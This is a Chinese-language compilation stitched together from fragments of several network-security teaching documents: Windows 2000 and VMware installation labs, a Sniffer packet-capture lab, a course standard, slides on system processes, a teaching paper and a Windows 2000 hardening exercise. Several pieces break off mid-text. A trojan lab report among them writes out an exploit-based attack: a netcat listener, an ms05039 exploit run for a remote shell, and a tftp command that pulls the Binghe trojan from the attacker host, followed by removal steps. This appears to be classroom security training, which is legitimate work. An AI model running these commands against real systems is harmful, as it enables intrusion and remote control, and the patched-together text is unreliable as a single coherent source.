计算机网络安全实验三win2000安全配置
实验七、Windows 2000服务器的安装与配置
实验七、Windows 2000服务器的安装1.实验目的掌握Windows 2000服务器的安装与配置方法。
2.实验要求(1) 学习Windows 2000服务器的安装环境。
(2) 学习Windows 2000服务器的安装过程,包括安装环境准备、安装方式、硬件配置以及网络参数的设置等。
(3) 学习使用Windows 2000安装程序对硬盘进行FAT/FAT32或NTFS方式分区。
3.实验内容(1)安装VMware虚拟机软件VMWare是一个“虚拟机”软件。
它使你可以在一台机器上同时运行二个或更多WIN2000/WINNT/WIN9X/DOS/LINUX系统。
与“多启动”系统相比,VMWare采用了完全不同的概念。
多启动系统在一个时刻只能运行一个系统,在系统切换时需要重新启动机器。
VMWare 是真正“同时”运行,多个操作系统在主系统的平台上,就象标准Windows应用程序那样切换。
而且每个操作系统你都可以进行虚拟的分区、配置而不影响真实硬盘的数据,你甚至可以通过网卡将几台虚拟机用网卡连接为一个局域网,极其方便。
为了能愉快的完成本部分实验,我们利用VMware虚拟机来安装Windows 2000服务器。
一般而言计算机的配置越高越好,推荐最低配置为:CPU 1500MHz内存 512M空闲硬盘空间 6GVMware软件安装比较简单,安装文件路径为:E:\software\VMware-server-installer-1.0.2-39867.exe大家双击安装文件就可以开始安装VMware虚拟机,安装完成后,要求输入注册码,注册码在E:\software\vmware-serial.txt文件中,打开文件,选择一条注册码填入即可。
注意:不要重启计算机!(2)在VMWARE中安装Windows 2000服务器运行VMware软件,点击点击“新建虚拟机”按钮,或者选择“File”——“New”——“New Virtual Machine”,弹出“New Virtual Machine Wizard”虚拟机安装向导窗口,直接点“下一步”,弹出“Virtual machine configuration”窗口,直接点“下一步”,弹出“Selec a Guest Operating System”窗口,如图7-1所示,请大家选择“Windows 2000 Server”。
windows操作系统安全设置实验总结
windows操作系统安全设置实验总结Windows操作系统安全设置实验总结操作系统的安全性对于保护个人信息和防止恶意软件的入侵至关重要。
在本次实验中,我们学习了Windows操作系统的安全设置,并了解了如何保护自己的计算机免受潜在的威胁。
以下是一步一步回答中括号内主题的总结。
1. 什么是操作系统安全设置?操作系统安全设置是指对操作系统进行调整和配置以保护计算机免受各种威胁的措施。
这些威胁可能包括恶意软件、网络攻击、数据泄露等。
操作系统安全设置的目的是确保计算机的机密性、完整性和可用性。
2. 为什么操作系统安全设置如此重要?操作系统是计算机系统的核心,负责管理计算机的资源、文件和网络连接。
如果操作系统受到攻击或未正确配置,用户的个人信息、敏感数据和财务信息都可能受到损害。
操作系统安全设置可以帮助我们保护计算机免受各种威胁,确保我们的数字生活安全。
3. 如何设置强密码?强密码是保护计算机账户免受未经授权访问的重要措施。
一个强密码应该是复杂的,包含字母、数字和符号,并且长度至少为8个字符。
此外,避免使用与个人信息相关的密码,以防止恶意攻击者通过猜测密码来入侵。
4. 如何设置用户账户控制(UAC)?用户账户控制(UAC)是Windows操作系统的一个安全功能,可阻止未经授权的更改和访问。
在控制面板中,可以通过点击“用户账户”选项来打开UAC设置。
建议将其设置为“总是通知”,即在进行敏感操作之前需要用户授权,以增加安全性。
5. 如何更新操作系统和软件?操作系统和软件的更新包含了修复已知漏洞和强化安全性的补丁程序。
Windows操作系统提供自动更新功能,可以在“设置”菜单中找到“更新和安全”选项,并启用自动更新功能。
此外,定期检查软件的官方网站,确保及时安装最新的补丁程序以提高系统的安全性。
6. 如何启用防火墙?防火墙可以过滤和阻止不明来源的网络流量,从而保护计算机免受网络攻击。
在Windows中,可以通过控制面板中的“Windows Defender防火墙”选项来启用防火墙。
计算机网络安全教程实验
11、建立一个虚拟的操作系统,这里按照默认的4G就够了。
点击按钮“下一步”进入文件存放路径设置界面,如图所示。
12、整个虚拟机上操作系统就包含在这个文件中,点击按钮“完成”,可以在VMware的主界面看到刚才配置的虚拟机,如图所示。
13、点击绿色的启动按钮来开启虚拟机,如图所示。
14、可以看到VMware的启动界面,相当于是一台独立的计算机,如图所示。
15、在图1-18中可以看到,按下功能键“F2”进入系统设置界面,进入虚拟机的BIOS(Basic Input and Out System)设置界面,如图所示。
16、为了使所有的网络安全攻击实验都可以成功完成,在虚拟上安装没有打过任何布丁的Windows Advanced Server 2000。
安装完毕后,虚拟机上的操作系统如图所示。
17、这样两套操作系统就成功的建成了。
启动成功后,进入操作系统,配置虚拟机上操作系统的IP地址,使之和主机能够通过网络进行通信,配置虚拟机操作系统的IP地址是:172.18.25.109,如图所示。
18、主机和虚拟机在同一网段,并可以通信。
利用Ping指令来测试网络是否连通。
在主机的DOS窗口中输入“Ping 172.18.25.109”,如图所示。
实验二Sniffer的使用实验目的:本实验主要学习利用Sniffer抓包软件的使用实验仪器设备:计算机实验环境:Windows 2000 Server、Sniffer实验内容:1、进入Sniffer主界面,抓包之前必须首先设置要抓取数据包的类型。
选择主菜单Capture下的Define Filter菜单,如图所示。
2、在抓包过滤器窗口中,选择Address选项卡,如图所示。
窗口中需要修改两个地方:在Address下拉列表中,选择抓包的类型是IP,在Station1下面输入主机的IP地址,主机的IP地址是172.18.25.110;在与之对应的Station2下面输入虚拟机的IP地址,虚拟机的IP地址是172.18.25.109。
《计算机网络基础》课程标准
计算机网络基础课程标准(计算机应用专业适用 72学时)一、课程性质与任务计算机网络基础课程是中等职业学校网络技术专业的专业基础课程,是计算机网络技术专业的导入课程。
本课程的任务是:本课程以培养学生能独立自主完成以使学生掌握网线制作、网络设备操作与管理任务为目标,与其他学习领域一同构成学生在计算机网络行业中相关岗位就业所具备的知识和技能,是计算机网络技术专业学生的必修课之一。
该课程主要是为培养学生将来能面向综合布线、网络管理员等岗位的计算机网络基础理论知识和动手能力的培养。
根据中等职业教育的培养目标,使学生深入了解未来所要从事的行业以及企业岗位工作内容,为深入学习和掌握计算机网络基础理论知识和操作技能打下基础,通过工学结合、校企合作的任务驱动型项目教学活动,以较强的职业针对性,最终培养从事面向综合布线、网络管理员等职业的素质和技能,并具备从事相关岗位的职业能力和可持续发展能力。
二、课程教学目标1. 使学生进一步了解、掌握计算机网络基础知识,提高学生计算机网络技术等方面的技能,使学生初步具有利用计算机解决学习、工作、生活中常见问题的能力。
2. 使学生能够根据职业需求运用计算机,体验利用计算机技术获取信息、处理信息、分析信息、发布信息的过程,逐渐养成独立思考、主动探究的学习方法,培养严谨的科学态度和团队协作意识。
3. 使学生树立知识产权意识,了解并能够遵守社会公共道德规范和相关法律法规,自觉抵制不良信息,依法进行信息技术活动。
三、教学内容结构本课程的教学内容由基础模块、职业模块两个部分构成。
1. 基础模块(不含*号部分)是各专业学生必修的基础性内容和应该达到的基本要求;*号部分是为适应不同地区、不同对象的教学要求而设立的内容,学校可根据具体情况进行选择。
2. 职业模块为限定选修内容,是结合基础模块进行的计算机综合应用能力训练。
职业模块旨在提升学生在工作、生活中应用计算机的能力,教学中可根据需要选择内容。
操作系统windows 2000实验报告
《操作系统》实验报告专业:年级:学号:提交日期:_______________________实验一:操作系统环境1.1 Windows 2000 系统管理(实验估计时间:60分钟)实验内容与步骤1、计算机管理2、事件查看器3、性能监视4、服务5、数据库(ODBC)为了帮助用户管理和监视系统,Windows 2000提供了多种系统管理工具,其中最主要的有计算机管理、事件查看器和性能监视等。
步骤1:登录进入Windows 2000 Professional。
步骤2:在“开始”菜单中单击“设置”-“控制面板”命令,双击“管理工具”图标。
在本地计算机“管理工具”组中,有哪些系统管理工具,基本功能是什么:1.本地安全策略:查看和修改本地安全策略,诸如用户权限和审计策略。
2.服务:启动和停止由Windows系统提供的各项服务。
3.计算机管理:管理磁盘以及使用其他系统工具来管理本地或远程计算机。
4.事件查看器:显示来自于Window和其他程序的监视与排错信息。
例如,在“系统日志”中包含各种系统组件记录的事件,如使用驱动器失败或加载其他系统组件;“安全日志”中包含有效与无效的登录尝试及与资源使用有关的事件,如删除文件或修改设置等,本地计算机上的安全日志只有本机用户才能查看;“应用程序日志”中包括由应用程序记录的事件等等。
5.数据源(ODBC):即开放数据库连接。
添加、删除以及配置ODBC数据源和驱动程序,通过ODBC可以访问来自多种数据库管理系统的数据。
6.性能:显示系统性能图表以及配置数据日志和警报。
7.组建服务:配置并管理COM+ 应用程序。
1. 计算机管理使用“计算机管理”可通过一个合并的桌面工具来管理本地或远程计算机,它将几个Windows 2000管理实用程序合并到一个控制台目录树中,使管理员可以轻松地访问特定计算机的管理属性和工具。
步骤3:在“管理工具”窗口中,双击“计算机管理”图标。
“计算机管理”使用的窗口与“Windows资源管理器”相似。
winnt&2k安全配置
附加的系统进程
• mstask.exe 允许程序在指定时间运行。(系统服 务) • regsvc.exe regsvc.exe 允许远程注册表操作。 (系统服务) • winmgmt.exe 提供系统管理信息(系统服务)。 • inetinfo.exe 通过Internet 信息服务的管理单 元提供信息服务连接和管理。(系统服务) • tlntsvr.exe 允许远程用户登录到系统并且使用 命令行运行控制台。(系统服务) • termsrv.exe 提供多会话环境允许客户端设备访 问虚拟的Windows 2000 Professional 桌面会话 以及运行在服务器上的桌面会话基于Windows 的 程序。(系统服务) • dns.exe 应答对域名系统 (DNS)名称的查询和 更新请求。(系统服务)
进程地址空间
线程 线程
线程
系统地址空间
系统进程
• 基本的系统进程 System Idle Process 这个进程是作为单线程运行在每个处理器上,并在 系统不处理其他线程的时候分派处理器的时间 smss.exe 会话管理子系统,负责启动用户会话 csrss.exe 子系统服务器进程 winlogon.exe 管理用户登录 services.exe 包含很多系统服务 lsass.exe 本地安全身份验证服务器 svchost.exe 包含很多系统服务 SPOOLSV.EXE 将文件加载到内存中以便迟后打 印。(系统服务) explorer.exe 资源管理器 internat.exe 托盘区的拼音图标
Win32 User GDI 图形驱动
进程和线程
• 什么是进程? – 代表了运行程序的一个实例 – 每一个进程有一个私有的内存地址 空间 • 什么是线程? – 进程内的一个执行上下文 – 进程内的所有线程共享相同的进程 地址空间 • 每一个进程启动时带有一个线程 – 运行程序的“主”函数 – 可以在同一个进程中创建其他的线 程 – 可以创建额外的进程
网络安全实验报告 (5)
《网络安全》实验报告实验序号:5 实验项目名称:木马攻击与防范实验图1 运行nc接着再开一个dos窗口,运行ms05039 192.168.20.23 192.168.20.1 99 1图2 运行ms2)攻击成功后,在运行nc -vv -l -p 99 的dos窗口中出现如图3提示,若攻不成功请参照“缓冲区溢出攻击与防范实验”,再次进行攻击。
图3 攻击成功示意3)在此窗口中运行tftp -i 192.168.20.1 get g_server.exe图4 上载木马程序并运行图5 文件传送步骤3:运行木马客户程序控制远程主机1)打开程序端程序,单击快捷工具栏中的“添加主机”按扭图6 添加主机2)“文件管理器”使用。
点击各个驱动器或者文件夹前面的展开符号,可以浏览目标主机内容。
图7 成功下载文件后界面2)“命令控制台”使用。
单击“命令控制台”的标签,弹出命令控制台界面步骤4:删除“冰河”木马✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 如图8。
在目录中发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这就是“冰河”木马在注册表中加入的键值,将它删除。
✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVesion\Runse rvices,如图9。
在目录中也发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这也是“冰河”在注册表中加入的键值,将它删除。
上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序,一般病毒程序,木马程序,后门程序等都放在这些子键目录下,所以要经常检查这些目录下的程序。
图8 注册表编辑图9注册表编辑然后再进入C:\WINNT\System32目录,找到“冰河”的两个可执行文件Kernel32.exe 和Sysexplr.exe文件,将它们删除。
中职计算机网络安全管理课教学论文
浅谈中职计算机网络安全管理课教学摘要:随着计算机网络技术的不断发展和进步,网络安全也面临着日趋严峻的安全威胁和挑战。
在这种形势下,中职学校计算机教学时就要做到与时俱进,让学生学习和适应新技术,在走上工作岗位后能满足社会的需要,有能力解决最新的计算机安全问题。
为了实现这一目的,中职学校教学就要为学生提供最新的理论教学,同时做好实验教学工作,实现理论和实践的有效结合,提高学生动手、动脑的能力。
关键词:中职;网络安全管理;教学中图分类号:tp393-4 文献标识码:a 文章编号:1007-9599 (2011) 22-0000-01vocational teaching of computer network security managementyu liyong(zhuji vocational education center,zhuji 311800,china) abstract:with the continuous development of computer network technology and progress,network security is also facing an increasingly serious security threats and challenges.in this situation,vocational schools,computer education will be times when,for students to learn and adapt to new technology,go to work to meet the needs of the community,have the ability to solve the latest computersecurity issues.to achieve this goal,the vocational school teaching should provide students with the latest theories of teaching,while making the teaching experiment,to achieve effective integration of theory and practice to enhance students practical,mental and physical capabilities.keywords:vocational;network securitymanagement;teaching一、影响计算机网络安全教学的主要因素(一)合理选择教材内容,优化教学内容体系。
计算机网络技术实训指导书
实训目标 掌握Windows 2000 Server的规划和安装登录和注销Windows 2000实训基础 Windows 2000的版本及其功能 Windows 2000的各版本的硬件要求 硬盘分区以及Windows2000 支持的文件系统 Windows 2000的许可模式 Windows 2000的服务器类型Windows 2000的登录和注销 实训环境 硬件环境 ·CPU:Inter Pentium 133Mhz或以上。
·RAM:128MB或以上。
·硬盘:2GB或以上,至少有1GB或以上的空闲空间。
·8X或以上、兼容性良好的光盘驱动器。
·3.5英寸、兼容性良好的软盘驱动器。
·带有VGA分辨率、兼容性良好的显卡和监视器。
·兼容性良好的10/100M以太网卡。
·兼容性良好的鼠标。
软件环境 ·Windows 2000 Server 简体中文版安装光盘实训任务 在已经安装windows 98的机器上全新安装Windows 2000 Server 进入Win98系统 → 打开光盘的I386文件夹 → 双击Winnt.exe启动安装程序 → 选择安装方式,检查硬件兼容性并复制安装文件 → 检查磁盘分区、安装硬件设备,进行网络和组件的设置 → 配置服务器。
登录Windows 2000 Server 注销Windows 2000 Server 实训目标掌握用户和组的设置学会设置和使用NTFS权限 学会设置共享文件夹及共享权限 掌握不同权限组合设置的方法 掌握客户端访问文件服务器共享资源的方法学会设置和使用分布式文件系统实训基础 本地用户账号、域用户账号的异同点常用的内置账号设置帐号的规则实训环境 硬件环境 ·一台安装好Windows 2000 Server 的计算机·若干台安装好Windows 2000的客户机·连接好的10BaseT 或100BaseT 以太网, 软件环境 ·在C盘(NTFS格式)上已建立test、file和shared文件夹,其中file文件夹包含st01 、st02、st03三个子文件夹。
安全配置windows服务器
一、实验目的了解Windows服务器的安全配置内容二、实验环境Windows Server 2003三、实验内容与要求安全配置Windows服务器实验的实验内容主要包括:账号管理:这包括用户分配帐户,设定不同的账户和账户组,如管理员用户、数据库用户、审计用户和来宾用户等。
密码设置:要求密码符合复杂性策略要求,例如最短密码长度为6个字符,启用本机组策略中密码必须符合复杂性要求的策略。
账户锁定策略:设置账户锁定的时间和锁定的阈值等。
本地策略:这包括对登录事件、对象访问、账户登录和驱动程序等进行管控。
审计策略:获取并存储系统和应用程序生成的错误警告和其他信息,这些信息被存储为一条条记录,每条记录包括事件发生时间、事件源、事件号和所属类别、机器名、用户名和事件本身的详细描述。
在配置过程中,需要注意的实验环境包括服务器系统管理员、应用管理员和网络安全管理员。
本配置实验适用的范围包括各省公司各部门维护管理的WINDOWS主机。
1.端口配置1.1 :依次点击“开始”->“设置”->“网络连接”,打开“网络连接”窗口。
如图1所示图11.2:选择“本地连接”,右键单击,在快捷菜单中选择“属性”打开其属性窗口。
如图2所示图21.3:选中“Internet协议(TCP/IP)”,点击“属性”按钮,打开其属性对话框。
如图3所示图31.4:点击“高级”按钮,打开“高级TCP/IP 设置”对话框并切换到“选项”便签下。
如图4所示图41.5:点击“属性”按钮,打开“TCP/IP筛选”对话框,勾选“启用TCP/IP筛选(所有适配器)”,“T CP端口”框中选择“只允许”单选按钮(假设该服务器为IIS服务器,仅允许80端口开放),点击“添加”按钮添加端口“80”。
如图5所示图51.6:在此“TCP/IP筛选”对话框中,也可对UDP端口及IP协议进行过滤设置,一般情况下,负载量不大的服务器仅允许对外提供服务的IP协议生效。
网络安全实验报告
{
printf("Cannot open this file\n");
return;
}
if ((fpw=fopen(filename2,"wb+"))==NULL)
{
printf("Cannot open this file\n");
软件:vc6.0;
实验主要步骤:
(1)完善AES加密、解密算法
(2)分析软件的执行效率即每秒钟加密的字节数
(3)给出改进意见
1.源程序;
//mainpro.cpp
//This modules is the main program;
//author:HJJD
//2008-11-25
#include "stdio.h"
for(i=0;i<=4*NB-1;i++) t2[i]=state[i%4][i/4];
blockxor(t2,v1,4*NB);
t3=t1;t1=v1;v1=t3;
fgetc(fpr);
if(!feof(fpr)) {fwrite(t2,1,4*NB,fpw);fseek(fpr,-1,1);}
return;
}
printf("Please input your key no more than %d char!\n",4*NK);
scanf("%s",userKey);
for(i=0;i<4*NK;i++) cipherkey[i]=userKey[i];
计算机网络安全实训总结
计算机网络安全实训总结1操作系统的安全配置:一个好的网络系统配置会有利于计算机文件的安全,保护管理员的信息等,对操作系统的配置我们总共采用了初级配置,中级配置和高级配置相关步骤,现将其主要介绍如下:注:(主要介绍Windows 2000服务器,同时本人可能用不同机器做不同实验,予以理解)操作系统的安全将决定网络的安全,从保护级别上分成安全初级篇、中级篇和高级篇,共36条基本配置原则,本人只介绍部分相关配置:准备工作:配置之前先进行基本配置包括 IP Sub Mask gateway DNS : 首先使用IP查看网络的相关配置如下图:图1-1 本地网络相关配置图由于事先网络中心已经对其进行配置,我们只需打开网上邻居的属性TCP/IP协议双击进行配置即可,当然如果是一台笔记本经常移动我们可以采用DHCP协议对其进行默认配置即可。
1.1初级配置:1.停止Guest账号:在计算机管理的用户里面把Guest帐号停用,任何时候都不允许Guest帐号登陆系统。
为了保险起见,最好给Guest 加一个复杂的密码,可以打开记事本,在里面输入一串包含特殊字符,数字,字母的长字符串这里我们设置liuyaotao。
用它作为Guest帐号的密码。
并且修改Guest 帐号的属性,设置拒绝远程访问,Xp中没有密码设置的功能。
2000系统和2000sever有,具体演示在录像中。
2.限制用户数量:去掉所有的测试帐户、共享帐号和普通部门帐号等等。
用户组策略设置相应权限,并且经常检查系统的帐户,删除已经不使用的帐户。
打开控制面板,用户管理进行相关的操作。
一般对于Windows NT/2000/XP主机,如果系统帐户超过10个,一般能找出一两个弱口令帐户,对系统不利,所以帐户数量要小于十个,这里我们设置用户为3个 Administrator,Student,Guest,具体演示在录像之中,请予以观赏。
3.多个管理员帐号:创建一个一般用户权限帐号用来处理电子邮件以及处理一些日常事物,另一个拥有Administrator权限的帐户只在需要的时候使用。
windows安全测试
一、实验目的及要求(一)实验目的通过实验掌握Windows账户与密码的安全设置、文件系统的保护和加密、安全策略与安全模板的使用、审核和日志的启用、本机漏洞检测软件MBSA的使用,建立一个Windows 操作系统的基本安全框架。
(二)实验要求根据教材中介绍的Windows操作系统的各项安全性实验要求,详细观察并记录设置前后系统的变化,给出分析报告。
二、实验设备及软件1台安装Windows2000/XP操作系统的计算机,磁盘格式配置为NTFS,预装MBSA(Microsoft Baseline Security Analyzer)工具。
三、实验内容1.账户与密码的安全设置2.文件系统的保护和加密3.启用安全策略与安全模板4.用加密软件EFS加密硬盘数据5.审核与日志查看6.利用MBSA检查和配置系统安全需要说明的是,下面的实验步骤主要是以Windows2000的设置为例进行说明,并且设置均需以管理员(Administrator)身份登陆系统。
在Windows XP操作系统中,相关安全设置会稍有不同,但XX小异。
四、实验步骤任务一账户和密码的安全设置1.删除不再使用的账户,禁用guest账户⑴检查和删除不必要的账户右键单击“开始”按钮,、打开“资源管理器”,选择“控制面板”中的“用户和密码”项;在弹出的对话框中中列出了系统的所有账户。
确认各账户是否仍在使用,删除其中不用的账户。
⑵禁用guest账户为了便于观察实验结果,确保实验用机在实验前可以使用guest账户登陆。
打开“控制面板”中的“管理工具”,选中“计算机管理”中“本地用户和组”,打开“用户”,右键单击guest账户,在弹出的对话框中选择“属性”,在弹出的对话框中“XX 已停用”一栏前打勾。
确定后,观察guest前的图标变化,并再次试用guest用户登陆,记录显示的信息。
2.启用账户策略⑴设置密码策略打开“控制面板”中的“管理工具”,在“本地安全策略”中选择“账户策略”;双击“密码策略”,在右窗口中,双击其中每一项,可按照需要改变密码特性的设置。
计算机操作系统实验报告
实验1:安装操作系统--安装Windows 2000 Professional1、实验目的:1) 通过对Windows 2000 Professional的安装操作,了解操作系统应用环境建立的初步过程。
2) 掌握对Windows操作系统的基本系统设置。
3) 了解Windows多操作系统安装的方法。
2、工具/准备工作在开始本实验之前,请回顾教科书的相关内容。
需要一台准备安装Windows 2000 Professional操作系统的计算机。
Windows 2000是一款功能强大的系统软件,它对系统的要求也比较高。
系统安装时,对计算机硬件设备的最低要求如表1-2所示。
表1-2 安装Windows 2000的硬件需求基本硬件设备基本需求建议需求实际情况CPU Pentium 166MHz Pentium II以上内存32MB 64MB以上磁盘空间(可用空间/总空间) 650MB/2GB 1.5GB/4GBCD-ROM或DVD-ROM光驱24倍速以上网卡和调制解调器VGA显卡及显示器、键盘、鼠标3、实验内容与步骤本实验以光盘启动、全新安装为例。
可以利用Windows 2000 Professional光盘来直接开机启动,开机后自动执行安装程序。
(因此,在执行安装操作之前,请检查你的计算机是否允许从光盘驱动器引导启动,否则应对机器的BIOS 进行相应的设置。
)安装Windows 2000 Professional首先需要建立分区,然后才开始运行安装程序。
所以,整个安装过程可分为两个阶段:·文字模式阶段:主要是选择用来安装Windows 2000的硬盘。
安装程序提供了建立分区、删除分区以及格式化等功能。
·GUI图形界面阶段:进行系统设置与复制文件的动作,完成Windows 2000系统的安装。
步骤1:将Windows 2000 Professional安装盘放入光驱,启动机器后,屏幕正常显示欢迎信息。
Win2000Server_03
确定
取消
连接 Windows 2000 网络资源
连接方式:
3.8.1 连接 Microsoft 网络
Internet 浏览器
运行 命令行 映射网络 驱动器
基于 Windows 2000
服务器
网上邻居
Windows 2000 Professional
使用“开始” 菜单中的“搜索”
连接 Novell NetWare 网络
第三章检查网络协议和 TCP/IP 协议集
网络协议介绍 协议和数据传输
常用协议
其他通信协议 远程访问协议 TCP/IP 介绍 TCP/IP 协议集 Windows 2000 连接 名称解析
学习数据传送过程
路由数据
网络协议介绍
3.1 网络协议介绍
协议类型 开放系统互连 (OSI) 参考模型
Microsoft 网络客户端 Windows 2000 客户端 服务
绑定
3.8 Windows 2000 连接
Novell NetWare 网络
NetWare 网关 (和客户端)服务
TCP/IP
绑定
协议
NWLink
网络适配器 (0)
连接 Microsoft 网络
3.8.1 连接 Microsoft 网络
协议和数据传输
其他通信协议 远程访问协议 TCP/IP 介绍 TCP/IP 协议集 Windows 2000 连接 名称解析
学习数据传送过程
路由数据
TCP/IP 介绍
3.6 TCP/IP 介绍
通信过程 TCP/IP 层
识别应用程序
网络安全实验指导
目录项目一Vmware虚拟机及sniffer抓包软件的使用项目二网络基本命令的使用项目三扫描和网络监听项目四后门与木马项目五操作系统安全配置方案项目六防火墙技术项目一Vmware虚拟机及sniffer抓包软件的使用一实验目的1、学会安装和使用vmware软件并能够熟练配置虚拟机。
2、学会使用sniffer软件抓取数据包。
二实验设备1、配置有vmware软件和sniffer软件的电脑多台。
2、局域网环境。
三实验学时4学时四实验内容1、安装vmware虚拟机。
2、配置vmware虚拟机。
1)在虚拟机中装操作系统,选择菜单栏“File”下的“New”菜单项,再选择子菜单“New Virtual Machine”。
2)有两种选择,选项“Typical”是典型安装,选项“Custom”是自定义安装,我们选择“Custom”安装方式。
点击按钮“下一步”。
3)进入选择操作系统界面,设置将来要安装的操作系统windows 2000 advanced sever. 点击按钮“下一步”.Used Bridged networking”,点击“下一步”。
Create a new virtual disk,点击下一步。
7)选择虚拟磁盘所要安装的目录,最后完成。
3、测试vmware虚拟机和局域网中其他电脑的连通性。
1)设置虚拟机的ip(与主机ip在同一网段)。
2)用ping命令测试虚拟机在局域网的连通性。
4、使用sniffer抓包1)进入Sniffer主界面,抓包之前必须首先设置要抓取数据包的类型。
选择主菜单Capture下的Define Filter菜单2)在Address下拉列表中,选择抓包的类型是IP。
3)点击该窗口的Advanced选项卡,拖动滚动条找到IP项,将IP 和ICMP选中。
4)主机的DOS窗口中Ping虚拟机,点击开始键,出现的窗口选择Decode选项卡,可以看到数据包在两台计算机间的传递过程。
五实验小结通过本次实验学生能够掌握vmware软件和sniffer软件的使用方法,为以后进一步学习打好基础。
实验二.操作系统安全配置
实验二、操作系统安全配置一.实验目的1.熟悉Windows NT/XP/2000系统的安全配置2. 理解可信计算机评价准则二.实验内容1. 修改Windows 系统注册表的安全配置,并验证2. 修改Windows 系统的安全服务设置,并验证3. 修改IE 浏览器安全设置,并验证4. 设置用户的本地安全策略,包括密码策略和帐户锁定策略。
5. 新建一个文件夹并设置其访问控制权限。
6. 学会用事件查看器查看三种日志。
7. 记录并分析实验现象三.实验过程1.Windows系统注册表的配置用“Regedit”命令启动注册表编辑器,配置Windows 系统注册表中的安全项(1)、关闭Windows 远程注册表服务通过任务栏的“开始-> 运行”,输入regedit 进入注册表编辑器。
找到注册表中HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services 下的“RemoteRegistry”项。
右键点击“RemoteRegistry”项,选择“删除”。
(2)修改系统注册表防止SYN 洪水攻击(a)找到注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters新建DWORD 值,名为SynAttackProtect。
(b)点击右键修改SynAttackProtec t 键值的属性。
(c)在弹出的“编辑DWORD 值”对话框数值数据栏中输入“2”(d)单击“确定”,继续在注册表中添加下列键值,防范SYN 洪水攻击。
EnablePMTUDiscovery REG_DWORD 0NoNameReleaseOnDemand REG_DWORD 1EnableDeadGWDetect REG_DWORD 0KeepAliveTime REG_DWORD 300,000PerformRouterDiscovery REG_DWORD 0EnableICMPRedirects REG_DWORD 0(3) 修改注册表防范IPC$攻击:(a)查找注册表中“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA”的“RestrictAnonymous”项。
Windows-2000-Server服务器配置与客户端配置
2021/12/12
图1.15
计算机网络实验教程
第2步:对于域中只有一台服务器的情况,只需跳到第3步
“授权”操作即可。对于域中有2台及以上服务器的较大型局 域网,承担DHCP服务器的不是当前服务器,需要另外指定,此 时右键单击左窗格中的“DHCP”,选择“添加服务器”菜单项, 弹出如图1.16所示的对话框。在“此服务器”文本框中输入一 台服务器,然后单击“确定”按钮即可,或通过浏览选择。
计算机网络实验
1 1.1 服务器配置 2 1.2 客户端配置 3 1.3实验内容及要求
2021/12/12
计算机网络实验教程
1.1.1 服务器IP地址配置
第1步:在“设置”菜单中打开“网络与拨号连接”对话框, 右键单击本地连接,选择“属性”菜单项,打开如图1.1所示 的网络连接项属性配置对话框。
3.TCP/IP属性设置
(1)IP地址设置,如图1.29所示; (2)“WINS地址”设置,如图1.30所示; (3)“DNS地址”设置,如图1.31所示;
2021/12/12
图1.29
图1.30
图1.31
计算机网络实验教程
4.配置客户端标识属性
第1步:在“我的电脑”图标上单击右键,在快捷菜单中选 择“属性”选项,打开“系统特性”配置对话框(也可以 在“控制面板”中双击“系统”选项打开这个配置对话 框),然后选择“网络标识”选项卡,如图1.32所示。
2021/12/12
图1.36
计算机网络实验教程
第6步:单击“下一步”,弹出如图1.37所示的对话框,该对 话框提醒管理员需准备好的相关信息,以便后续配置。
Windows2000AdvanceServe安全设置服务器教程电脑资料
Windows 2000 Advance Serve安全设置服务器教程 -电脑资料网络安全应该是网络管理的一个重点,如何构建安全的企业网,是每个企业网管的重要工作,Windows 2000 Advance Serve是比较流行的服务器操作系统之一,但是要想安全的配置微软的这个操作系统,却不是一件容易的事,Windows 2000 Advance Serve安全设置服务器教程。
下面我就自己的工作经验,谈谈Windows 2000 Advance Serve网络的安全设置.一、定制自己的Windows 2000 Advance Serve1.版本的选择:Win2000有各种语言的版本,对于我们来说,可以选择英文版或简体中文版,我强烈建议:在语言不成为障碍的情况下,请一定使用英文版。
要知道,微软的产品是以Bug & Patch而著称的,中文版的Bug远远多于英文版,而补丁一般还会迟至少半个月(也就是说一般微软公布了漏洞后你的机子还会有半个月处于无保护状况)。
2.组件的安装:Win2000在默认情况下进行典型安装,不过这种安装的系统是脆弱的,不够安全的,根据安全原则,最少的服务+最小的权限=最大的安全。
请根据自己服务器的所需要求做出合理的配置。
3.根据用途对服务器进行单独管理:就是说如果你根据企业的各种需要作出有不同功能的服务器,原则上是一台服务服务器只提供单独的服务,如域控制器,文件服务器,备份服务器,WEB服务器,FTP服务器等等。
二、合理安装Windows 2000 Advance Serve1.安装Windows 2000 Advance Serve,建议最少CREATE两个分区,一个系统分区,一个应用程序分区。
2.顺序的选择:Windows 2000 Advance Serve在安装中有几个顺序是一定要注意的:首先,Windows 2000 Advance Serve在安装时有一个漏洞,在你输入Administrator密码后,系统就建立了ADMIN$的共享,但是并没有用你刚刚输入的密码来保护它,这种情况一直持续到你再次启动后,在此期间,任何人都可以通过ADMIN$进入你的机器;只要安装一完成,各种服务就会自动运行,而这时的服务器是满身漏洞,非常容易进入的,因此,在完全安装并配置好Win2000 Server之前,一定不要把主机接入网络,电脑资料《Windows 2000 Advance Serve安全设置服务器教程》。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
实验:在Windows 2000上实现操作系统安全配置方案
实验环境
1台带有活动网络连接(插有网卡且工作正常)、安装有VMware 虚拟机软件的PC机,其中主机环境的配置如表5_1所示:
表5_1 本环境:主机操作系统的配置
虚拟机环境的配置如下表5_2所示:
表5_2 本环境:虚拟机操作系统的配置
具体本实验中,要求1人一组完成对操作系统的安全配置。
实验目的
1、通过该实验,熟悉、了解网络环境中提高Windows系列操作系统安全性的配置方法,充分理解系统注册表的重要性,进一步加深对TCP/IP协议的理解和认识。
